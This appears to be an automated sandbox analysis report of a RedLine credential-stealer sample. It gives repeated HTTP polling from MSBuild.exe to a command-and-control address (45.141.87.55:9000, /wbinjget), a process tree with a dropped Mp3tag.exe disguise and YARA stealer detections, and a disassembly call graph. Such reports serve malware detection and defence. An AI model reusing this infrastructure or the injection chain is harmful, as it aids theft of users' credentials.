                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 22, 2024 15:49:58.047864914 CET110OUTGET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1
                                                                                                          Host: 45.141.87.55:9000
                                                                                                          Connection: Keep-Alive
                                                                                                          Nov 22, 2024 15:49:59.405731916 CET414INHTTP/1.1 200 OK
                                                                                                          Cache-Control: no-cache
                                                                                                          Content-Length: 0
                                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                                                                                          Access-Control-Allow-Headers: *
                                                                                                          Access-Control-Expose-Headers:
                                                                                                          Accept: */*
                                                                                                          Accept-Language: en-US, en
                                                                                                          Accept-Charset: ISO-8859-1, utf-8
                                                                                                          Host: *:9000
                                                                                                          Date: Fri, 22 Nov 2024 14:49:59 GMT
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          38192.168.2.74996645.141.87.5590001456C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 22, 2024 15:49:59.641676903 CET86OUTGET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1
                                                                                                          Host: 45.141.87.55:9000
                                                                                                          Nov 22, 2024 15:50:00.955302954 CET414INHTTP/1.1 200 OK
                                                                                                          Cache-Control: no-cache
                                                                                                          Content-Length: 0
                                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                                                                                          Access-Control-Allow-Headers: *
                                                                                                          Access-Control-Expose-Headers:
                                                                                                          Accept: */*
                                                                                                          Accept-Language: en-US, en
                                                                                                          Accept-Charset: ISO-8859-1, utf-8
                                                                                                          Host: *:9000
                                                                                                          Date: Fri, 22 Nov 2024 14:50:00 GMT
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          39192.168.2.74997145.141.87.5590001456C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 22, 2024 15:50:01.191376925 CET110OUTGET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1
                                                                                                          Host: 45.141.87.55:9000
                                                                                                          Connection: Keep-Alive
                                                                                                          Nov 22, 2024 15:50:02.576848984 CET414INHTTP/1.1 200 OK
                                                                                                          Cache-Control: no-cache
                                                                                                          Content-Length: 0
                                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                                                                                          Access-Control-Allow-Headers: *
                                                                                                          Access-Control-Expose-Headers:
                                                                                                          Accept: */*
                                                                                                          Accept-Language: en-US, en
                                                                                                          Accept-Charset: ISO-8859-1, utf-8
                                                                                                          Host: *:9000
                                                                                                          Date: Fri, 22 Nov 2024 14:50:02 GMT
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          40192.168.2.74997545.141.87.5590001456C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 22, 2024 15:50:02.797761917 CET86OUTGET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1
                                                                                                          Host: 45.141.87.55:9000
                                                                                                          Nov 22, 2024 15:50:04.119625092 CET414INHTTP/1.1 200 OK
                                                                                                          Cache-Control: no-cache
                                                                                                          Content-Length: 0
                                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                                                                                          Access-Control-Allow-Headers: *
                                                                                                          Access-Control-Expose-Headers:
                                                                                                          Accept: */*
                                                                                                          Accept-Language: en-US, en
                                                                                                          Accept-Charset: ISO-8859-1, utf-8
                                                                                                          Host: *:9000
                                                                                                          Date: Fri, 22 Nov 2024 14:50:03 GMT
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          41192.168.2.74997945.141.87.5590001456C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 22, 2024 15:50:04.347598076 CET86OUTGET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1
                                                                                                          Host: 45.141.87.55:9000
                                                                                                          Nov 22, 2024 15:50:05.729048967 CET414INHTTP/1.1 200 OK
                                                                                                          Cache-Control: no-cache
                                                                                                          Content-Length: 0
                                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                                                                                          Access-Control-Allow-Headers: *
                                                                                                          Access-Control-Expose-Headers:
                                                                                                          Accept: */*
                                                                                                          Accept-Language: en-US, en
                                                                                                          Accept-Charset: ISO-8859-1, utf-8
                                                                                                          Host: *:9000
                                                                                                          Date: Fri, 22 Nov 2024 14:50:05 GMT
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          42192.168.2.74998345.141.87.5590001456C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 22, 2024 15:50:06.099560976 CET86OUTGET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1
                                                                                                          Host: 45.141.87.55:9000
                                                                                                          Nov 22, 2024 15:50:07.534396887 CET414INHTTP/1.1 200 OK
                                                                                                          Cache-Control: no-cache
                                                                                                          Content-Length: 0
                                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                                                                                          Access-Control-Allow-Headers: *
                                                                                                          Access-Control-Expose-Headers:
                                                                                                          Accept: */*
                                                                                                          Accept-Language: en-US, en
                                                                                                          Accept-Charset: ISO-8859-1, utf-8
                                                                                                          Host: *:9000
                                                                                                          Date: Fri, 22 Nov 2024 14:50:07 GMT
                                                                                                          Connection: close


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          43192.168.2.74998945.141.87.5590001456C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Nov 22, 2024 15:50:07.770590067 CET86OUTGET /wbinjget?q=ABEE5D020398559D1CCC81B5F72669AE HTTP/1.1
                                                                                                          Host: 45.141.87.55:9000
                                                                                                          Nov 22, 2024 15:50:09.192671061 CET414INHTTP/1.1 200 OK
                                                                                                          Cache-Control: no-cache
                                                                                                          Content-Length: 0
                                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE, PATCH
                                                                                                          Access-Control-Allow-Headers: *
                                                                                                          Access-Control-Expose-Headers:
                                                                                                          Accept: */*
                                                                                                          Accept-Language: en-US, en
                                                                                                          Accept-Charset: ISO-8859-1, utf-8
                                                                                                          Host: *:9000
                                                                                                          Date: Fri, 22 Nov 2024 14:50:08 GMT
                                                                                                          Connection: close


                                                                                                          Statistics

                                                                                                          CPU Usage

                                                                                                          Click to jump to process

                                                                                                          Memory Usage

                                                                                                          Click to jump to process

                                                                                                          High Level Behavior Distribution

                                                                                                          Click to dive into process behavior distribution

                                                                                                          Behavior

                                                                                                          Click to jump to process

                                                                                                          System Behavior

                                                                                                          General

                                                                                                          Target ID:5
                                                                                                          Start time:09:48:03
                                                                                                          Start date:22/11/2024
                                                                                                          Path:C:\Users\user\Desktop\file.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                          Imagebase:0x7ff7390c0000
                                                                                                          File size:6'821'123 bytes
                                                                                                          MD5 hash:BFC5EA31B4AEEFEC1508E8F5B458E574
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:low
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:7
                                                                                                          Start time:09:48:06
                                                                                                          Start date:22/11/2024
                                                                                                          Path:C:\Users\user\AppData\Local\Temp\Bijouterie\Mp3tag.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Users\user~1\AppData\Local\Temp\Bijouterie\Mp3tag.exe"
                                                                                                          Imagebase:0x140000000
                                                                                                          File size:12'606'192 bytes
                                                                                                          MD5 hash:A7118DFFEAC3772076F1A39A364D608D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:Borland Delphi
                                                                                                          Antivirus matches:
                                                                                                          • Detection: 0%, ReversingLabs
                                                                                                          Reputation:low
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:9
                                                                                                          Start time:09:48:13
                                                                                                          Start date:22/11/2024
                                                                                                          Path:C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exe
                                                                                                          Imagebase:0x140000000
                                                                                                          File size:12'606'192 bytes
                                                                                                          MD5 hash:A7118DFFEAC3772076F1A39A364D608D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:Borland Delphi
                                                                                                          Antivirus matches:
                                                                                                          • Detection: 0%, ReversingLabs
                                                                                                          Reputation:low
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:11
                                                                                                          Start time:09:48:21
                                                                                                          Start date:22/11/2024
                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:C:\Windows\SysWOW64\cmd.exe
                                                                                                          Imagebase:0x410000
                                                                                                          File size:236'544 bytes
                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.1779706990.0000000005440000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000B.00000002.1779706990.0000000005440000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:12
                                                                                                          Start time:09:48:21
                                                                                                          Start date:22/11/2024
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff75da10000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:false

                                                                                                          General

                                                                                                          Target ID:14
                                                                                                          Start time:11:11:25
                                                                                                          Start date:22/11/2024
                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                          Imagebase:0x70000
                                                                                                          File size:262'432 bytes
                                                                                                          MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.2522571454.00000000006A7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          Reputation:high
                                                                                                          Has exited:false

                                                                                                          General

                                                                                                          Target ID:15
                                                                                                          Start time:11:11:25
                                                                                                          Start date:22/11/2024
                                                                                                          Path:C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\Downloadplugin\Mp3tag.exe"
                                                                                                          Imagebase:0x140000000
                                                                                                          File size:12'606'192 bytes
                                                                                                          MD5 hash:A7118DFFEAC3772076F1A39A364D608D
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:Borland Delphi
                                                                                                          Reputation:low
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:16
                                                                                                          Start time:11:11:32
                                                                                                          Start date:22/11/2024
                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:C:\Windows\SysWOW64\cmd.exe
                                                                                                          Imagebase:0x410000
                                                                                                          File size:236'544 bytes
                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.2056182127.0000000005800000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000010.00000002.2056182127.0000000005800000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:17
                                                                                                          Start time:11:11:32
                                                                                                          Start date:22/11/2024
                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          Imagebase:0x7ff75da10000
                                                                                                          File size:862'208 bytes
                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:20
                                                                                                          Start time:11:11:52
                                                                                                          Start date:22/11/2024
                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                          Imagebase:0xe70000
                                                                                                          File size:262'432 bytes
                                                                                                          MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                          Has elevated privileges:false
                                                                                                          Has administrator privileges:false
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000014.00000002.2055832534.0000000001302000.00000002.00000001.01000000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000014.00000002.2055832534.0000000001302000.00000002.00000001.01000000.00000000.sdmp, Author: Joe Security
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          Disassembly

                                                                                                          Reset < >

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:15.8%
                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                            Signature Coverage:21.7%
                                                                                                            Total number of Nodes:2000
                                                                                                            Total number of Limit Nodes:21
                                                                                                            execution_graph 20350 7ff7390d202b 20351 7ff7390d202f 20350->20351 20352 7ff7390d98e0 _handle_error 8 API calls 20351->20352 20353 7ff7390d20c0 20352->20353 20303 7ff7390dbf28 20310 7ff7390de2e8 20303->20310 20309 7ff7390dbf35 20311 7ff7390de2f0 20310->20311 20313 7ff7390de321 20311->20313 20314 7ff7390dbf31 20311->20314 20323 7ff7390de668 20311->20323 20315 7ff7390de330 __vcrt_uninitialize_locks DeleteCriticalSection 20313->20315 20314->20309 20316 7ff7390dc3ec 20314->20316 20315->20314 20328 7ff7390de53c 20316->20328 20324 7ff7390de3ec __vcrt_FlsAlloc 5 API calls 20323->20324 20325 7ff7390de69e 20324->20325 20326 7ff7390de6b3 InitializeCriticalSectionAndSpinCount 20325->20326 20327 7ff7390de6a8 20325->20327 20326->20327 20327->20311 20329 7ff7390de3ec __vcrt_FlsAlloc 5 API calls 20328->20329 20330 7ff7390de561 TlsAlloc 20329->20330 20366 7ff7390d8c23 20367 7ff7390d8c28 20366->20367 20368 7ff7390d9330 std::_Xinvalid_argument 14 API calls 20367->20368 20369 7ff7390d8c67 20368->20369 18988 7ff7390d8a1f 18989 7ff7390d8927 18988->18989 18989->18988 18990 7ff7390d9330 std::_Xinvalid_argument 14 API calls 18989->18990 18990->18989 21134 7ff7390d891b 21135 7ff7390d8927 21134->21135 21136 7ff7390d9330 std::_Xinvalid_argument 14 API calls 21135->21136 21136->21135 20384 7ff7390c1050 20385 7ff7390c6e6c 47 API calls 20384->20385 20386 7ff7390c1060 20385->20386 20389 7ff7390d9ef4 20386->20389 20388 7ff7390d9f39 20390 7ff7390d9f0e 20389->20390 20392 7ff7390d9f07 20389->20392 20393 7ff7390e3b6c 20390->20393 20392->20388 20396 7ff7390e3728 20393->20396 20403 7ff7390e64b8 EnterCriticalSection 20396->20403 20404 7ff7390e5a50 20414 7ff7390ea93c 20404->20414 20415 7ff7390ea948 20414->20415 20437 7ff7390e64b8 EnterCriticalSection 20415->20437 19738 7ff7390da03c 19761 7ff7390d9d34 19738->19761 19741 7ff7390da188 19839 7ff7390da3b8 IsProcessorFeaturePresent 19741->19839 19742 7ff7390da058 __scrt_acquire_startup_lock 19744 7ff7390da192 19742->19744 19751 7ff7390da076 __scrt_release_startup_lock 19742->19751 19745 7ff7390da3b8 7 API calls 19744->19745 19747 7ff7390da19d abort 19745->19747 19746 7ff7390da09b 19748 7ff7390da121 19769 7ff7390da504 19748->19769 19750 7ff7390da126 19772 7ff7390e3df0 19750->19772 19751->19746 19751->19748 19828 7ff7390e311c 19751->19828 19846 7ff7390da1f8 19761->19846 19764 7ff7390d9d63 19848 7ff7390e3d20 19764->19848 19765 7ff7390d9d5f 19765->19741 19765->19742 20045 7ff7390da940 19769->20045 19773 7ff7390e7850 48 API calls 19772->19773 19775 7ff7390e3dff 19773->19775 19774 7ff7390da12e 19777 7ff7390d8588 19774->19777 19775->19774 20047 7ff7390e7c58 19775->20047 20051 7ff7390c84b0 19777->20051 19781 7ff7390d85cf 20112 7ff7390d47f0 19781->20112 19783 7ff7390d85d9 memcpy_s 19784 7ff7390d85ef GetCommandLineW 19783->19784 19785 7ff7390d86c5 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 19784->19785 19786 7ff7390d8601 19784->19786 19788 7ff7390c3774 swprintf 46 API calls 19785->19788 20148 7ff7390d667c 19786->20148 19790 7ff7390d8747 SetEnvironmentVariableW GetModuleHandleW LoadIconW 19788->19790 20117 7ff7390d5598 LoadBitmapW 19790->20117 19791 7ff7390d8616 OpenFileMappingW 19795 7ff7390d8634 MapViewOfFile 19791->19795 19796 7ff7390d86b2 CloseHandle 19791->19796 19792 7ff7390d86bd 19794 7ff7390d8100 10 API calls 19792->19794 19794->19785 19798 7ff7390d8652 BuildCatchObjectHelperInternal 19795->19798 19799 7ff7390d86a9 UnmapViewOfFile 19795->19799 19796->19785 20154 7ff7390d8100 19798->20154 19799->19796 19801 7ff7390d87a1 20141 7ff7390d26bc 19801->20141 19808 7ff7390c7098 78 API calls 19810 7ff7390d868d 19808->19810 19811 7ff7390c71e4 78 API calls 19810->19811 19812 7ff7390d869c 19811->19812 19812->19799 19829 7ff7390e3148 19828->19829 19830 7ff7390e315a 19828->19830 19829->19748 20298 7ff7390e4060 19830->20298 19840 7ff7390da3de memcpy_s abort 19839->19840 19841 7ff7390da3fd RtlCaptureContext RtlLookupFunctionEntry 19840->19841 19842 7ff7390da426 RtlVirtualUnwind 19841->19842 19843 7ff7390da462 memcpy_s 19841->19843 19842->19843 19844 7ff7390da494 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 19843->19844 19845 7ff7390da4e6 abort 19844->19845 19845->19744 19847 7ff7390d9d56 __scrt_dllmain_crt_thread_attach 19846->19847 19847->19764 19847->19765 19849 7ff7390e7e6c 19848->19849 19850 7ff7390d9d68 19849->19850 19861 7ff7390e6470 19849->19861 19867 7ff7390e7850 19849->19867 19871 7ff7390e5cd0 19849->19871 19882 7ff7390e4680 19849->19882 19850->19765 19855 7ff7390dbf50 19850->19855 19856 7ff7390dbf62 19855->19856 19857 7ff7390dbf58 19855->19857 19856->19765 20023 7ff7390dc434 19857->20023 19862 7ff7390e6478 19861->19862 19864 7ff7390e64a9 19862->19864 19865 7ff7390e64a5 19862->19865 19889 7ff7390e6844 19862->19889 19894 7ff7390e64e0 19864->19894 19865->19849 19868 7ff7390e7869 19867->19868 19869 7ff7390e785d 19867->19869 19868->19849 19898 7ff7390e7690 19869->19898 20008 7ff7390e64b8 EnterCriticalSection 19871->20008 20009 7ff7390e66d4 19882->20009 19885 7ff7390e469b 19885->19849 19886 7ff7390e45d4 _invalid_parameter_noinfo_noreturn 15 API calls 19887 7ff7390e46a4 19886->19887 19887->19885 20014 7ff7390e46c0 19887->20014 19890 7ff7390e6534 __vcrt_uninitialize_ptd 5 API calls 19889->19890 19891 7ff7390e687f 19890->19891 19892 7ff7390e689c InitializeCriticalSectionAndSpinCount 19891->19892 19893 7ff7390e6887 19891->19893 19892->19893 19893->19862 19895 7ff7390e650b 19894->19895 19896 7ff7390e650f 19895->19896 19897 7ff7390e64ee DeleteCriticalSection 19895->19897 19896->19865 19897->19895 19899 7ff7390e4540 abort 35 API calls 19898->19899 19900 7ff7390e76a9 19899->19900 19901 7ff7390e7878 _snwprintf 35 API calls 19900->19901 19902 7ff7390e76b2 19901->19902 19918 7ff7390e739c 19902->19918 19905 7ff7390e76cc 19905->19868 19906 7ff7390e4870 swprintf 16 API calls 19909 7ff7390e76dd 19906->19909 19907 7ff7390e7778 19908 7ff7390e46e4 Concurrency::details::SchedulerProxy::DeleteThis 15 API calls 19907->19908 19908->19905 19909->19907 19925 7ff7390e7938 19909->19925 19912 7ff7390e7773 19913 7ff7390e4850 _set_fmode 15 API calls 19912->19913 19913->19907 19914 7ff7390e77d5 19914->19907 19935 7ff7390e714c 19914->19935 19915 7ff7390e7798 19915->19914 19916 7ff7390e46e4 Concurrency::details::SchedulerProxy::DeleteThis 15 API calls 19915->19916 19916->19914 19919 7ff7390deec0 _snwprintf 35 API calls 19918->19919 19920 7ff7390e73b0 19919->19920 19921 7ff7390e73bc GetOEMCP 19920->19921 19922 7ff7390e73ce 19920->19922 19923 7ff7390e73e3 19921->19923 19922->19923 19924 7ff7390e73d3 GetACP 19922->19924 19923->19905 19923->19906 19924->19923 19926 7ff7390e739c 37 API calls 19925->19926 19927 7ff7390e7965 19926->19927 19928 7ff7390e796d 19927->19928 19929 7ff7390e79af IsValidCodePage 19927->19929 19934 7ff7390e79d5 memcpy_s 19927->19934 19931 7ff7390d98e0 _handle_error 8 API calls 19928->19931 19929->19928 19930 7ff7390e79c0 GetCPInfo 19929->19930 19930->19928 19930->19934 19932 7ff7390e776c 19931->19932 19932->19912 19932->19915 19942 7ff7390e74ac GetCPInfo 19934->19942 20007 7ff7390e64b8 EnterCriticalSection 19935->20007 19943 7ff7390e75d5 19942->19943 19947 7ff7390e74f5 19942->19947 19946 7ff7390d98e0 _handle_error 8 API calls 19943->19946 19949 7ff7390e7679 19946->19949 19952 7ff7390e8878 19947->19952 19949->19928 19951 7ff7390e63cc swprintf 40 API calls 19951->19943 19953 7ff7390deec0 _snwprintf 35 API calls 19952->19953 19954 7ff7390e88ba MultiByteToWideChar 19953->19954 19956 7ff7390e88ff 19954->19956 19957 7ff7390e88f8 19954->19957 19958 7ff7390e4870 swprintf 16 API calls 19956->19958 19962 7ff7390e892d memcpy_s _snwprintf 19956->19962 19959 7ff7390d98e0 _handle_error 8 API calls 19957->19959 19958->19962 19960 7ff7390e7569 19959->19960 19966 7ff7390e63cc 19960->19966 19961 7ff7390e899d MultiByteToWideChar 19963 7ff7390e89be GetStringTypeW 19961->19963 19964 7ff7390e89d8 19961->19964 19962->19961 19962->19964 19963->19964 19964->19957 19965 7ff7390e46e4 Concurrency::details::SchedulerProxy::DeleteThis 15 API calls 19964->19965 19965->19957 19967 7ff7390deec0 _snwprintf 35 API calls 19966->19967 19968 7ff7390e63f1 19967->19968 19971 7ff7390e6070 19968->19971 19972 7ff7390e60b2 swprintf 19971->19972 19973 7ff7390e60d6 MultiByteToWideChar 19972->19973 19974 7ff7390e6381 19973->19974 19975 7ff7390e6108 19973->19975 19976 7ff7390d98e0 _handle_error 8 API calls 19974->19976 19978 7ff7390e4870 swprintf 16 API calls 19975->19978 19980 7ff7390e6140 _snwprintf 19975->19980 19977 7ff7390e638f 19976->19977 19977->19951 19978->19980 19979 7ff7390e61a4 MultiByteToWideChar 19981 7ff7390e61ca 19979->19981 19984 7ff7390e6255 19979->19984 19980->19979 19980->19984 19998 7ff7390e68bc 19981->19998 19984->19974 19985 7ff7390e46e4 Concurrency::details::SchedulerProxy::DeleteThis 15 API calls 19984->19985 19985->19974 19986 7ff7390e6264 19988 7ff7390e628f _snwprintf 19986->19988 19989 7ff7390e4870 swprintf 16 API calls 19986->19989 19987 7ff7390e6212 19987->19984 19990 7ff7390e68bc swprintf 6 API calls 19987->19990 19988->19984 19991 7ff7390e68bc swprintf 6 API calls 19988->19991 19989->19988 19990->19984 19992 7ff7390e6322 19991->19992 19993 7ff7390e6358 19992->19993 19994 7ff7390e634c WideCharToMultiByte 19992->19994 19993->19984 19995 7ff7390e46e4 Concurrency::details::SchedulerProxy::DeleteThis 15 API calls 19993->19995 19994->19993 19996 7ff7390e63b8 19994->19996 19995->19984 19996->19984 19997 7ff7390e46e4 Concurrency::details::SchedulerProxy::DeleteThis 15 API calls 19996->19997 19997->19984 19999 7ff7390e6534 __vcrt_uninitialize_ptd 5 API calls 19998->19999 20000 7ff7390e68ff 19999->20000 20003 7ff7390e61fc 20000->20003 20004 7ff7390e69ac 20000->20004 20002 7ff7390e6968 LCMapStringW 20002->20003 20003->19984 20003->19986 20003->19987 20005 7ff7390e6534 __vcrt_uninitialize_ptd 5 API calls 20004->20005 20006 7ff7390e69df swprintf 20005->20006 20006->20002 20010 7ff7390e6534 __vcrt_uninitialize_ptd 5 API calls 20009->20010 20011 7ff7390e6700 20010->20011 20012 7ff7390e6718 TlsAlloc 20011->20012 20013 7ff7390e4690 20011->20013 20012->20013 20013->19885 20013->19886 20015 7ff7390e46cf 20014->20015 20017 7ff7390e46d4 20014->20017 20018 7ff7390e672c 20015->20018 20017->19885 20019 7ff7390e6534 __vcrt_uninitialize_ptd 5 API calls 20018->20019 20020 7ff7390e6757 20019->20020 20021 7ff7390e676e TlsFree 20020->20021 20022 7ff7390e675f 20020->20022 20021->20022 20022->20017 20024 7ff7390dc443 20023->20024 20026 7ff7390dbf5d 20023->20026 20031 7ff7390de584 20024->20031 20027 7ff7390de330 20026->20027 20028 7ff7390de35b 20027->20028 20029 7ff7390de35f 20028->20029 20030 7ff7390de33e DeleteCriticalSection 20028->20030 20029->19856 20030->20028 20035 7ff7390de3ec 20031->20035 20036 7ff7390de513 TlsFree 20035->20036 20043 7ff7390de430 __vcrt_FlsAlloc 20035->20043 20037 7ff7390de45e LoadLibraryExW 20039 7ff7390de4d5 20037->20039 20040 7ff7390de47f GetLastError 20037->20040 20038 7ff7390de4f5 GetProcAddress 20038->20036 20042 7ff7390de506 20038->20042 20039->20038 20041 7ff7390de4ec FreeLibrary 20039->20041 20040->20043 20041->20038 20042->20036 20043->20036 20043->20037 20043->20038 20044 7ff7390de4a1 LoadLibraryExW 20043->20044 20044->20039 20044->20043 20046 7ff7390da51b GetStartupInfoW 20045->20046 20046->19750 20048 7ff7390e7be0 20047->20048 20049 7ff7390deec0 _snwprintf 35 API calls 20048->20049 20050 7ff7390e7c04 20049->20050 20050->19775 20052 7ff7390d9920 _snwprintf 20051->20052 20053 7ff7390c84d4 GetModuleHandleW 20052->20053 20054 7ff7390c8506 GetProcAddress 20053->20054 20055 7ff7390c855b 20053->20055 20057 7ff7390c8533 GetProcAddress 20054->20057 20058 7ff7390c851b 20054->20058 20056 7ff7390c894e GetModuleFileNameW 20055->20056 20174 7ff7390e27fc 20055->20174 20071 7ff7390c896c 20056->20071 20057->20055 20060 7ff7390c8548 20057->20060 20058->20057 20060->20055 20062 7ff7390c8869 GetModuleFileNameW CreateFileW 20063 7ff7390c88b3 SetFilePointer 20062->20063 20064 7ff7390c8945 CloseHandle 20062->20064 20063->20064 20065 7ff7390c88c8 ReadFile 20063->20065 20064->20056 